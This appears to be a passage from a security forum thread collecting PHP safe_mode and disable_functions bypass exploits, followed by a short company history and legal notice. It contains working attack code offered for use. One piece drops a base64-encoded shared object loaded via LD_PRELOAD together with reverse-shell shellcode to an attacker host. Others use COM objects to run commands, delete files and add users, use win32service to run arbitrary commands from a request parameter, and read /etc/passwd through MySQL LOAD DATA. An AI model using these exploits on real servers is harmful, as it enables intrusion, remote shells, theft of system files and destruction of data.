AAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD AACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA ABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA AgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA AAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A AAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A AAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA CAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0 HwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA AAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA AAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA AAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ AAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA AAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA YAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD AAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf AAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS AAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA AAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j AAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA AAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA AAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA EADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA AAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf 
R0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0 X3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf UmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w AF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x LjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==" ; } if (!function_exists('file_put_contents')){ function file_put_contents($filename, $data){ $f = @fopen($filename, 'w'); if (!$f){ return false; } else{ $bytes = fwrite($f, $data); fclose($f); return $bytes; } } } // Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp' file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader)); $ip = gethostbyname($host); $port1 = sprintf('%c', ($port>> 8)&255 ); $port2 = sprintf('%c', ($port>> 0)&255 ); $part = explode('.', $ip); //$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]); $STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]); /* * linux/x86/shell_reverse_tcp - 71 bytes * [url]http://www.metasploit.com[/url] * Encoder: generic/none * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5, * PrependSetresuid=false, PrependSetreuid=false, * PrependSetuid=false, PrependChrootBreak=false, * AppendExit=false */ $Xshellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80". "\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2."\x66\x53\x6a\x10". "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f". "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69". 
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00" ; if(isset($_REQUEST['shellcode'])){ // just for fans of metasploit $Xshellcode=base64_decode($_REQUEST['shellcode']); } file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode); $cwd = '/tmp/'; $env = array('LD_PRELOAD' => '/tmp/shellcode.so'); unset($var); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w")); // BOOM proc_open('IHSteam', $descriptorspec, $var, $cwd, $env); mail("IHSteam","IHSteam","IHSteam","IHSteam"); ?>
  13. PHP 5.x COM functions safe_mode and disable_function bypass

<?php
//PHP 5.x COM functions safe_mode and disable_function bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//dork: intitle:phpinfo intext:"php version" +windows (thanks to rgod)
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//from: http://www.phpfreaks...ge/ref.com.html
//Requirements:
//COM functions are only available for the Windows version of PHP.
//.Net support requires PHP 5 and the .Net runtime.
//Installation:
//There is no installation needed to use these functions; they are part of the PHP core. -> (sounds good)
//The windows version of PHP has built in support for this extension. You do not need to
//load any additional extension in order to use these functions.
//You are responsible for installing support for the various COM objects that you intend
//to use (such as MS Word); we don't and can't bundle all of those with PHP.
//mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are
//a lot of users if PHP developers decide to implement COM functions as part of PHP core.
//take a look here: intitle:phpinfo intext:"php version" +windows (thanks to rgod).
//Anyway, I think they should take much care on security due to the fact that, through these
//functions, you can seriously compromise a pc.
//For remote execution you need (naturally) to use a server that is MS based,
//e.g. Apache for win configured for working with PHP.
//In this scenario, someone could upload a script and then use it to damage the server.
//Local execution simply bypasses all Windows protections against execution of dangerous
//COM objects (even kill-bit) due to the fact that the script is executed from a client that
//does not check these settings.
//php.ini settings:
//safe_mode = On
//disable_functions = com_load_typelib
//open_basedir = htdocs
//Remote execution requires that open_basedir is disabled
$mPath = str_repeat("..\\", 20);
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); //this one uses compatUI.dll
$compatUI->RunApplication("something", "notepad.exe", 1); //to run notepad.exe
$wscript = new COM('wscript.shell'); //this one uses wscript.exe
$wscript->Run("cmd.exe /c calc.exe"); //to run calc.exe
$FSO = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx
$FSO->OpenTextFile($mPath."something.bat", 8, true); //to create a batch file on server... yes,
                                                     //if you want you can write to this batch file
$FSOdelFile = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx
$FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True); //to delete all files with txt extension
$FSOdelFolder = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx
$FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True); //to delete an entire folder
$shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); //this one uses shgina.dll
$shgina->Create("shinnai"); //to add a user
?>
  14. PHP 5.x (win32service) Local Safe Mode Bypass Exploit

<?php
$command = (isset($_GET['CMD'])) ? $_GET['CMD'] : 'dir'; #command
$dir = ini_get('upload_tmp_dir'); #Directory to store command's output
if (!extension_loaded('win32service')) die('win32service extension not found!');
$name = $dir."\\".uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array('service'=>$n, 'display'=>$n, 'path'=>$cmd, 'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec = file_get_contents($name);
unlink($name);
echo "<pre>".htmlspecialchars($exec)."</pre>";
?>
  15. Hi All Friends, Today we Have Public And P8 Methods & Exploits For Bypass Safe Mode:

First PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability

<?php
file_get_contents('/etc/passwd');
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l);
mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$result = mysql_query("SELECT a FROM a.a");
while (list($row) = mysql_fetch_row($result)) print $row . chr(10);
?>

History of the Iran Cyber Security Forum

The Iran Cyber security company began its work in 2009, employing specialists in the field of security and offering solutions for network security and database security.

With a new approach to providing services and consulting in the security of organizations and institutions, penetration testing, and software development, in constructive collaboration with organizations, the company has made customer focus the cornerstone of its work and is ready to cooperate with various companies and agencies.

Compliance with the Law

Given its legitimate and official presence in security circles and among security assessment companies, the Iran Cyber security company and forum is bound to comply with the law, and forum users are likewise bound to comply with the laws of the Islamic Republic of Iran.
